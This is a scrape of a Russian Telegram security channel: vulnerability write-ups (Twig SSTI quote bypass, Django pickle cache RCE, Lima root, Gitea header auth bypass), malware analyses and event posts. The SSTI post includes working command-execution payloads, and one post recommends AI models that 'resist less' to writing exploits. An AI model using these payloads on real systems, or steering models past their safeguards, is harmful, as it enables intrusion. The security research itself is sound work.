Похек
16.4K subscribers
2.3K photos
116 videos
243 files
3.21K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
SSTI ❤️ htmlspecialchars()

Попался тут интересный проект, в котором нашлась Twig SSTI'ка, до которой, чтобы добраться, нужно обойти несколько ограничений:
Удалось её обнаружить после того, как я решил поиграться с шаблонами для почты. Обычная нагрузка {{7*7}} давала по итогу 7*7. Подумав, что это может быть какой-то кривой патч, я вставил нагрузку {{{{7*7}}}} и получил в итоге 49 (никогда не думал, что встречу такой тупизм :D) ! Казалось бы, что это победа, однако если нагрузка сложнее математической операции, например, {{{{['id']|filter('system')}}}}, то ничего не отрабатывало. Поэтому я решил залезть в код и поискать эту чудо-функцию =)

Ниже представлен ооочень отдалённый пример кода, чтобы был понятен контекст:

<?php
require_once 'vendor/autoload.php';
error_reporting(E_ERROR | E_PARSE);

class User {
public $username;
public $secondname;
public function __construct($username, $secondname) {
$this->username = $username;
$this->secondname = $secondname;
}
}

$allowed = ['user.username'];

function prepareVars(string $template, array $allowedKeys): string {
return preg_replace_callback(
'/\{\{(.*?)\}\}/i', //Регулярка для извлечения значения между {{...}}
function ($matches) use ($allowedKeys) {
$value = trim($matches[1] ?? ''); //Берётся наше значение
if (in_array($value, $allowedKeys)) { //Оно скорее всего не подпадает под $allowedKeys
return "{{ {$value} | raw }}";
}
return htmlspecialchars($value, ENT_QUOTES, 'UTF-8'); //В итоге оно попадает сюда с ENT_QUOTES
},
$template
);
}

$username = $_GET['username'] ?? 'John';
$secondname = $_GET['secondname'] ?? 'Doe';
$user = new User($username, $secondname);
$templateInput = $_GET['template'] ?? 'Guest';
$fullTemplate = 'Hello ' . $templateInput;
$processedTemplate = prepareVars($fullTemplate, $allowed);
$loader = new \Twig\Loader\ArrayLoader([
'index' => $processedTemplate,
]);
$twig = new \Twig\Environment($loader);
echo $twig->render('index', ['user' => $user]);


Отсюда мы видим причину, почему приходилось использовать 2 пары фигурных скобок, а также новую проблему - htmlspecialchars с ENT_QUOTES. Некоторое время я думал, что с этим делать, так как большинство нагрузок для RCE требуют какие-либо кавычки, а потом до меня дошло:
Мне для той же нагрузки {{['id']|filter('system')}} нужно передать именно соответствующие строки, необязательно их передавать в формате с кавычками, можно передать какую-либо доступную переменную, содержащую нужное значение. Например, мы тут видим, что можем использовать поля объекта класса User: через username передать id, а через secondname передать system. По итогу будет что-то типа такого - /?template={{{{[user.username]|filter(user.secondname)}}}}&username=ls&secondname=system.
В моём случае приложение было на PHP Symfony, а данные о пользователе передавались не от меня. Ознакомившись с документацией, можно узнать, что нам достаточно проставить необходимые значения в поля пользователя(просто зайти в раздел профиля УЗ и установить нужные значения), а дальше использовать их через {{app.user.*}} уже в Twig в уязвимом разделе.

Если же у вас только одно контролируемое значение(например subject), а нужно передать 2 строки в SSTI, то просто в subject пихаем 2 строки вместе: idsystem. А дальше извлекаем их посимвольно:
{{{{[subject|slice(0,2)]|filter(subject|slice(-6))}}}}
🔥9
Похек
Победителей выбрали в конкурсе на анти нейрослоп советов для Standoff 365 Bug Bounty . Просьба тех, кто увидел свой ник и коммент найти меня на Standoff Talks. Я на первом этаже, хожу в панамке чёрной и черной футболке BugHunter
Фотоотчёт подарков со Standoff Talks

Наушники Redmi Buds Bugs 6 с нанесением Standoff Talks
Набор дрип кофэ (Standoff one love за такое ❤️) в прикольном тканевом мешочке
Стикеры, куда же без них
Небольшой шнурок с ремувкой и карабином игрушечным
Металлическая кружка мерчевая, чисто для походов как будто
Мультитул острый по размеру дебетовой карты
Спортивная бутылка в зальчик ходить
Металлические головоломки в количестве трех штук, самое то на созвонах руки занять, пока внимательно слушаешь коллег (кстати 1 умом уже решил и 2 методом грубой силы))
Журнал от Standoff 365. Довольно прикольно понастольгировать с фоток за прошлые года + есть некоторые прикольные скрины из консолек и бурпа
Журнал Хакера, тут как всегда всё шикарно)
Шевроны прикольные
Подушка прикольная, песочного цвета

Выше это я описал мерч паки: коммьюнити партнёра + спикер пак. Поэтому есть для вас мотивация выступить в следующий раз или же прийти как СМИ и осветить мероприятие))

А для тех кто учавствовал в конкурсе дарили крутые панамки, которые вы также можете увидеть на фото)

p.s. на фото не всё влезло!
p.s. фото сгенерировано ChatGPT, могут быть небольшие не совпадения с реальностью. Но общий вайб подарков передан отлично)

🌚 @poxek | 🌚 @poxek_ai | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤‍🔥2
Django, pickle и RCE через cache poisoning

HackedAlert описал RCE-сценарий для Django 6.0.4: атакующий записывает в Redis/Memcached вредный pickle-объект под ключ сессии, затем отправляет запрос с нужным sessionid, и приложение само достает значение из кэша. Механика реальная: в RedisCache после неудачного int() вызывается pickle.loads(), а PyMemcacheCache по умолчанию использует pymemcache.serde.pickle_serde.

Ограничение в другом: это не “любой Django 6.0.4 выполняет код по HTTP”. В официальных release notes 6.0.4 нет RCE по cache backend: там один moderate и четыре low security issue. Для эксплуатации нужен контроль над данными в cache backend: открытый Redis/Memcached, SSRF до внутреннего Redis, боковое перемещение или общий кэш между разными trust zone. Без возможности записать произвольное значение в кэш цепочка не складывается.

Риск все равно практичный. Во многих продакшенах Redis считается внутренним сервисом и остается без ACL, TLS и жесткой сетевой изоляции. Тогда кэш перестает быть просто ускорителем: запись в него может стать выполнением кода в процессе Django-приложения.

Проверять надо не только версию Django. Смотрите SESSION_ENGINE, CACHES, доступ к Redis/Memcached, разделение кэшей между сервисами и возможность заменить pickle на безопасный serializer для конкретных данных. Обновления нужны, но этот класс риска закрывается архитектурой: изоляцией cache backend, аутентификацией, ACL и запретом общих кэшей между разными уровнями доверия.

🌚 @poxek | 🌚 @poxek_ai | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤‍🔥6
TokenTwin Checker: маленький Burp плагин для BAC/IDOR

Посмотрел rootdr-backup/TokenTwin-Checker по коду, не только по README. Это Jython-расширение для Burp Suite: берёт выбранные запросы из контекстного меню, подставляет заголовки разных пользователей и сравнивает ответы по статусу и хэшу тела. Идея простая: быстро прогнать один и тот же endpoint от имени User A/User B/нескольких аккаунтов и подсветить возможный BAC/IDOR, если ответы совпали там, где должны различаться.

Качество кода нормальное для однофайлового Burp расширения: поток анализа вынесен отдельно, UI не совсем блокируется, есть Stop, фильтр статических ресурсов, baseline/all-vs-all режимы, POC-viewer и merge cookie через OrderedDict. Но это всё ещё один файл на 1600+ строк с Swing/Jython-кодом, где UI, модель данных, сетевой прогон и экспорт смешаны. Лучше было бы разнести на несколько файлов

Что бы я допилил первым: явную UTF-8 запись/чтение JSON и CSV вместо системной кодировки Java, лимит/очистку _msg_store, потому что сейчас полные req/resp могут раздувать размер проекта Burp на длинных сессиях + помним что Бурп всё ещё хреново работает с ОЗУ, валидацию импортируемого JSON и header names/values, чтобы не тащить мусор в buildHttpMessage(), и предкомпиляцию ignore-regex с видимой ошибкой пользователю вместо молчаливого except.

Я пока его не потестил, но идея и реализация выглядит вполне рабоче и здраво

Из ближайших аналогов могу предложить попробовать errorfiathck/IDOR-Forge или SKILL для ИИ агентов

🌚 @poxek | 🌚 @poxek_ai | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
6
CVE-2026-53657: root внутри Lima QEMU-гостя через открытый сокет агента

Разобрал CVE-2026-53657 в Lima: до версии v2.1.2 непривилегированный пользователь внутри QEMU-гостя мог подключиться к /run/lima-guestagent.sock и через lima-guestagent, запущенный от root, выполнить команды с uid=0 внутри этой же VM. В advisory уязвимость оценена как High, CVSS 8.2; исправление вышло в Lima v2.1.3.

Механика сводится к открытой локальной границе доверия. Агент гостевой системы в QEMU-режиме работал от root, поднимал gRPC API без аутентификации на Unix-сокете и выставлял этому сокету права 0o777. За сокетом был RPC-вызов Tunnel: агент мог открыть соединение к адресу, который задает клиент, включая локальные Unix-сокеты привилегированных демонов. В итоге обычный пользователь гостя мог заставить root-процесс выступить посредником, а конечный сервис видел учетные данные агента, а не исходного пользователя.

Публично описанная цепочка выглядит так:
непривилегированный пользователь
-> /run/lima-guestagent.sock (mode 0o777, владелец root)
-> gRPC API агента гостевой системы без аутентификации
-> Tunnel RPC, который подключается к произвольному адресу от имени root
-> root-only IPC, например D-Bus
-> выполнение команд как root внутри гостя

Корневая причина сводится к одной строке в cmd/lima-guestagent/daemon_linux.go в Lima v2.1.2:
os.Chmod(socket, 0o777)

Границы воздействия здесь стоит держать точными: это не побег из гостевой VM на хост и не удаленная эксплуатация. Атакующему уже нужен локальный доступ внутрь Lima QEMU VM. VZ-драйвер на macOS не затронут: там агент использует vsock, а не этот Unix-сокет. Но для сред разработки, где в одной VM живут разные процессы, CI-задачи или тестовые нагрузки, баг ломает внутреннюю модель изоляции: обычный аккаунт становится root внутри гостя.

Исправление получилось минимальным. Commit 8a45892 меняет модель доступа к сокету: вместо chmod 0o777 Lima добавила параметр --socket-owner, передает UID основного пользователя, меняет владельца сокета через chown и ставит chmod 0o600. Граница доступа закрывается на уровне IPC, без переписывания каждого RPC-вызова.

Публичного PoC на CVE-2026-53657 сейчас нет. Авторы write-up на Syntetisk прямо пишут, что намеренно не публикуют пошаговые детали эксплуатации: точку назначения для перенаправления, механику проксирования и исполняемые файлы PoC они оставляют приватными. Если командам нужно проверить уязвимость до или после обновления, исследователи предлагают связаться с ними напрямую.

Быстрая самостоятельная проверка внутри гостя — владелец и права /run/lima-guestagent.sock: 0o777 root указывает на уязвимое состояние, 0o600 на основном пользователе соответствует исправлению. Теоретически PoC можно собрать из исходников Lima v2.1.2 + оригинальный райтап + ИИ агент (я советую попробовать Mimo v2.5 Pro или GLM 5.2, они меньше сопротивляются для написания сплойтов и автосканеров. Но сойдет gpt-5.5 или sonnet 4.6 [НЕ 5 ВЕРСИЯ]/opus 4.8 ).

🌚 @poxek | 🌚 @poxek_ai | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥611
AI как новая поверхность атаки: реальные инциденты, мошенничество и уязвимости агентной эпохи

Коротко
▪️AI стал поверхностью атаки там, где модель получает не только текст, но и данные, инструменты, права и доверенный контекст. Но вроде как агент без всего этого бесполезено...?)
▪️Самые сильные публичные кейсы сегодня не про “модель сама нашла 0day”, а про деньги, утечки, токены, рабочие базы, расширения браузера, агентные действия и фишинг под видом AI-сервисов.
▪️В статье кейсы ранжируются по наблюдаемому ущербу: прямые потери и утечки выше исследовательских PoC.

AI уже надо учитывать как отдельную поверхность атаки. Не потому, что модели «сами взламывают компании», а потому что вокруг них появились новые доверенные контуры: ИИ-платформы хранят чаты, токены, исходный код и пользовательские данные; ИИ-бренды используют в фишинге; ИИ-инструменты получают доступ к браузеру, почте, GitHub, терминалу и боевым средам; агенты начинают действовать от имени пользователя.

Просьба поддержать аппами и комментариями на Habr)
https://habr.com/ru/articles/1054618/

🌚 @poxek | 🌚 @poxek_ai | 📲
Please open Telegram to view this post
VIEW IN TELEGRAM
2😱43
Вот и все, практически два года в Бастионе прошли

Теперь настало время расти дальше и развивать те задачи, которые мне интересны. Респект команде PR Бастиона, пока что лучшая команда PR с которой мне доводилось работать)

Ещё услышимся, как говорится ИБ - большая деревня)
51🏆57🔥177😱7😁3🎉3❤‍🔥22
CVE-2026-20896 в Gitea уже начали дергать вживую: по данным Sysdig, первая активность появилась через 13 дней после раскрытия

В Docker-шаблоне app.ini был дефолт REVERSE_PROXY_TRUSTED_PROXIES = *, хотя безопасное значение должно доверять только loopback. Если админ включил ENABLE_REVERSE_PROXY_AUTHENTICATION для работы за аутентифицирующим reverse proxy и при этом HTTP-порт контейнера доступен напрямую, любой клиент может прислать X-WEBAUTH-USER: poxek и попасть в Gitea как poxek без пароля и токена.

♾️Импакт♾️
Известный или угадываемый логин превращается в сессию этого пользователя. Для admin, gitea_admin и похожих имен это уже полный takeover Gitea на уровне приложения: приватные репозитории, пользователи, организации, packages, релизы, вебхуки и потенциально downstream CI/CD. RCE не является гарантированным блекбокс импактом самой CVE; его можно заявлять только если конкретная инсталляция позволяет дойти до выполнения кода через runner, хуки, CI-секреты или deployment-пайплайн.

♾️PoC♾️
Я не нашёл публичных PoC, поэтому написал свой и выложил публичный PoC/чекер: szybnev/cve-2026-20896-gitea-poc

В репе есть Go-версия для массовой проверки с --targets, --user-file, --concurrency, --jsonl и --dry-run, плюс простой Bash скриптик без зависимостей. Чекер сначала парсит страницу и не фаззит usernames, если видит Gitea >=1.26.3, например Powered by Gitea Version: 1.26.4. Для уязвимой локальной 1.26.2 проверка подтверждает impersonation по title dashboard без cookie и пароля.

♾️Митигация♾️
▪️обновиться минимум до 1.26.3, лучше до 1.26.4+;
▪️не публиковать giea напрямую
▪️явно настроить trusted proxies
▪️не включать reverse-proxy auth без понятной сетевой границы

🔗Источники:
GHSA-f75j-4cw6-rmx4 / Gitea 1.26.3/1.26.4 release notes
fix PR #38151 / CVE record
Sysdig telemetry via The Hacker News

🌚 @poxek | 🌚 @poxek_ai | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍42
RedWing: Android-шпион в аренду через Telegram

RedWing — хорошо упакованный Malware-as-a-Service. По данным Zimperium zLabs, оператор получает Telegram-бота и панель, где можно собрать дроппер, выбрать фальшивую страницу магазина приложений, подставить рейтинги, отзывы и число загрузок, а затем сгенерировать APK под свою вредоносную кампанию. В приманках имитируются Google Play, Galaxy Store, AppGallery, а один из образцов маскировался под RuStore.

Дальше всё держится на правах, которые пользователь сам выдаёт под давлением интерфейса. RedWing по очереди просит отключить ограничения батареи, назначить приложение обработчиком SMS, дать доступ к уведомлениям, Accessibility и показу поверх других окон. После этого это уже не просто стилер: C2 видит статус прав, список приложений, SMS, контакты, вызовы, файлы и локацию, может открывать URL и приложения, рисовать банковские/крипто-оверлеи, вести кейлогинг, стримить экран через VNC/MediaProjection, включать камеру и микрофон. Отдельная деталь — команда на включение переадресации вызовов через *21*...#, чтобы перехватывать голосовые проверки банка.

♾️Как защищаться♾️
1. Пользовательский минимум: не ставить APK из ссылок в мессенджерах и "сторонних магазинов приложений", открытых из рекламы или чата; не выдавать Accessibility, роль SMS-приложения, доступ к уведомлениям и «поверх других окон» неизвестным приложениям. Самое опасное из этого Accessibility, т.к. иногда даже права администратора не нужны, если разработчик ВПО знает как правильно написать малварь с относительно минимальными правами

2. Быстрая проверка телефона: открыть настройки Android и посмотреть Accessibility, приложения по умолчанию для SMS, доступ к уведомлениям, администраторов устройства, приложения с неограниченной работой в фоне и правом рисовать поверх окон. Всё лишнее — отключить и удалить, лучше из безопасного режима.

3. Если уже были банковские операции: связаться с банком, сбросить пароли, перевыпустить токены/карты по ситуации, проверить переадресацию вызовов у оператора или через ##21#, перенести 2FA с SMS на приложение/аппаратный ключ там, где это возможно.

4. Для компаний: MDM-политикой запретить установку из неизвестных источников, ограничить Accessibility и роль SMS-приложения, ставить алерты на связку Overlay + Notification Listener + SMS + MediaProjection, охотиться по поведению и IoC.

🌚 @poxek | 🌚 @poxek_ai | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
7
IonStack: root Android 17 с одного URL

Nebula Security показала IonStack — публичную демонстрацию цепочки Firefox → Linux kernel, которая на Android 17 может довести один клик по URL до root-доступа. В цепочке две уязвимости: CVE-2026-10702, JIT miscompilation в JavaScript Engine Firefox, закрытая в Firefox 151.0.3, и CVE-2026-43499 GhostLock — use-after-free в rtmutex/futex-PI коде ядра Linux.

Технически это browser-to-kernel full chain. Сначала баг в Firefox дает выполнение кода в контексте браузера, затем локальная kernel LPE пробивает изоляцию и повышает привилегии. У GhostLock механика: обычные threading/futex syscalls оставляют висячий указатель на стек ядра; по данным Nebula, уязвимый диапазон — Linux 2.6.39-rc1 до 7.1-rc1 при CONFIG_FUTEX_PI=y, а их эксплуатация в kernelCTF была около 97% стабильной.

Важное ограничение: это публичное исследовательское демо и открытый PoC, а не подтверждение массовой эксплуатации. Android-часть зависит от Firefox/Fenix и конкретной поддержки ядра на устройстве; на демо-сайте Nebula прямо предупреждает о возможных падениях, изменениях в системе и потере данных.

🐱 GitHub PoC

🌚 @poxek | 🌚 @poxek_ai | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
10
PowerShell не умер

Материал Maland на Screetsec хорошо показывает, почему PowerShell все еще жив в red team и реальных атаках. Используем штатный Windows-инструмент с доступом к .NET, памяти процесса, системным API и привычным административным сценариям.

В статье собран почти полный маршрут операции: fileless-нагрузка, социальная инженерия через ClickFix/Fake CAPTCHA и FileFix, запуск через Run dialog или адресную строку Explorer, обход Execution Policy, AMSI, Script Block Logging и ETW, разведка в AD, повышение привилегий, выгрузка учетных данных и зачистка следов. Ценность материала в том, что он показывает не один трюк, а цепочки: ClickFix становится убедительнее, когда маскируется под интервью, Google Meet или HR-портал.

Защитный вывод простой: Execution Policy нельзя считать границей безопасности. Microsoft описывает ее как механизм против случайного запуска, а не как контроль, ограничивающий действия пользователя. Поэтому ставка только на AllSigned или запрет .ps1 быстро ломается о iex, вставку команд вручную, выполнение в памяти и обфускацию строк.

Что смотреть защитникам: PowerShell из необычных родительских процессов, команды из буфера обмена после веб-страниц, обращения к RunMRU, сетевые загрузки, попытки отключить Defender/AMSI/логирование, правки PSReadLine history и цепочки Explorer -> PowerShell. Red Canary (это база, стыдно не знать) в Threat Detection Report ставит PowerShell на 2-е место среди техник по распространенности, так что это не ретро-тема.

Итог: блокировать PowerShell вслепую нереалистично. Рабочая модель — Windows App Control/Constrained Language Mode, Tamper Protection, телеметрия процессов, командной строки, сети, Script Block Logging, AMSI/ETW и отдельные детекты под пользовательские цепочки вроде ClickFix.

Upd: Make Powershell great again! 😂

🌚 @poxek | 🌚 @poxek_ai | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥131
LOLCreds: карта учётных данных, которые могут быть вам интересны

Нашёл LOLCreds - открытый каталог, который сводит сведения об учётных данных 159 продуктов: дефолтные логины и пароли, автоматически создаваемые секреты, токены, API-ключи, пары ключей, пути к ним и шаблоны утечек. На момент проверки в базе 594 записи; 27 продуктов имеют известные статические значения по умолчанию.

Это полезнее обычного списка default credentials. В карточках указаны и значение, и его природа: задано администратором, генерируется при установке, статично, не требует аутентификации или не документировано. Каталог охватывает CI/CD, сетевое оборудование, базы данных, облако, SaaS и AI API.

Для аудита это даёт несколько направлений: проверить образ развёртывания, найти оставшиеся инсталляционные секреты, уточнить правила поиска в репозиториях и сопоставить инвентаризацию с тем, что реально создаёт продукт.

Удобно парсить и мониторить сайт, чтобы в своих CPTшках прикрутить или усилить автопроверки на дефолтные креды к разного рода ПО и железякам

Проект на Github: haxxm0nkey/lolcreds-data

🌚 @poxek | 🌚 @poxek_ai | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥133
LegacyHive: новый Windows 0-day или обход старой защиты?

Nightmare Eclipse опубликовал LegacyHive — PoC для Windows User Profile Service (ProfSvc), заставляющий службу загрузить чужой реестровый hive UsrClass.dat. Автор заявляет, что техника работает на всех поддерживаемых версиях Windows с обновлениями за июль 2026 года.

Цепочка требует учетные данные второго стандартного пользователя и имя третьего аккаунта-цели, которым может быть администратор. PoC меняет в NTUSER.DAT второго аккаунта значение Local AppData, направляя его в \\.\globalroot\BaseNamedObjects\Restricted. Затем он создает символические ссылки Object Manager, ставит batch oplock на копию UsrClass.dat и вызывает CreateProcessWithLogonW с LOGON_WITH_PROFILE. Когда ProfSvc открывает hive, oplock дает окно для переключения пути на каталог цели. Результат проверяется через RegOpenUserClassesRoot.

Механизм напоминает CVE-2015-0004: тогда junction-атака также позволяла ProfSvc загрузить UsrClass.dat другого пользователя. Microsoft закрыла тот вариант проверками доступа к NTUSER.DAT и UsrClass.dat; LegacyHive, судя по коду, обходит эту защиту через пространство имен Object Manager и гонку на oplock.

Но подтвержденным 0-day это пока не стало. У находки нет CVE, advisory MSRC или независимой технической валидации - и вряд ли он её получит понимая что у него с Microsoft очень натянутые и такие, около судебные отношения.

Блю тиму стоит отслеживать изменения User Shell Folders\Local AppData, объекты в \BaseNamedObjects\Restricted, oplock вокруг UsrClass.dat и нетипичные загрузки профилей. Основная зона риска — RDS-хосты и другие многопользовательские Windows-системы.

🌚 @poxek | 🌚 @poxek_ai | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥4❤‍🔥2
Forwarded from DUCKERZ
На 1️⃣2️⃣3️⃣4️⃣5️⃣6️⃣7️⃣ открылась регистрация на Пляжный сезон!

Пляжный сезон стартует на нашей платформе уже 2 августа и продлится до 31 августа. Этот сезон пройдёт в формате турнира на выбывание с дуэлями 1 на 1.

Регистрация участников на основной этап сезона будет открыта в течение недели, с 15.07 по 22.07. На основании заявок будет отобрано 16 человек, которые будут участвовать в турнире. Все дуэли будут проходить в прямом эфире, участники будут решать задания в реальном времени и транслировать экран, а ведущие комментировать происходящее.

Для участников, не прошедших отбор, а также пользователей платформы, не подававших заявку, во время сезона будут выложены отдельные задания, анонс которых будет проходить на стримах. За решение этих заданий предусмотрен отдельный призовой фонд.

Спонсором сезона выступает 🐂 BI.ZONE Bug Bounty

Призы за турнир:
🐥1 место – мерч от BI.ZONЕ Bug Bounty и секретный суперприз
🐥2 место – мерч от BI.ZONЕ Bug Bounty и DUCKERZ
🐥3 место – мерч от BI.ZONЕ Bug Bounty

Призы за сезонные задания:
🐥 1-3 место – мерч от BI.ZONЕ Bug Bounty

Подать заявку на участие:
👉 Регистрация 👈

🐥 Канал | 🐥 Чат | 🐥 Платформа | 🐂 Спонсор сезона
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍5
RATON RAT: комбайн из стилера, RAT и вымогателя в одном .NET-файле

Decoda Labs разобрала образец RATON RAT. Это .NET-ратник под .NET Framework 4.7.2, которая, судя по всему упаковывает зависимости через Costura.Fody и оставляет на диске один исполняемый файл вместо набора библиотек.

Набор заявленных команд чрезмерно широк: сбор паролей и cookie из Chrome, Edge, Firefox, Brave и Opera, Discord-токены, RDP-учётные данные, кошельки и игровые аккаунты; кейлоггер, снимки экрана, микрофон, буфер обмена; HTTP/SOCKS5-прокси, DDoS, закрепление через Run-ключи и задачи планировщика. В образце также найдены строки, указывающие на шифрование файлов и мини-игру «Сапёр» с угрозой удаления данных при проигрыше.

Но это именно карта возможностей, а не подтверждение каждой ветки. Например, клиппер криптовалютных адресов выводится по строкам и Base58-алфавиту: логику подмены адресов исследователи не восстановили. Признаки process hollowing, скрытого рабочего стола и обхода UAC выглядят убедительно, но для части из них Decoda прямо оставляет статус гипотезы.

Для детектирования здесь полезнее поведенческие сигналы, чем имя семейства: прямое чтение SQLite-баз браузеров, создание задач с /sc ONLOGON и /rl HIGHEST, записи в Run-ключи, отключение Defender, обращение к C:\ChromeAutomationData и аналогичным каталогам. В статье также приведён жёстко зашитый IP 89[.]125[.]120[.]77; его роль не подтверждена, поэтому блокировать индикатор стоит после проверки в своей телеметрии.

🌚 @poxek | 🌚 @poxek_ai | 📲MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Лето CyberCamp 2026

Выступил на главной сцене на тему ИИ для red team и blue team
🔥19👍2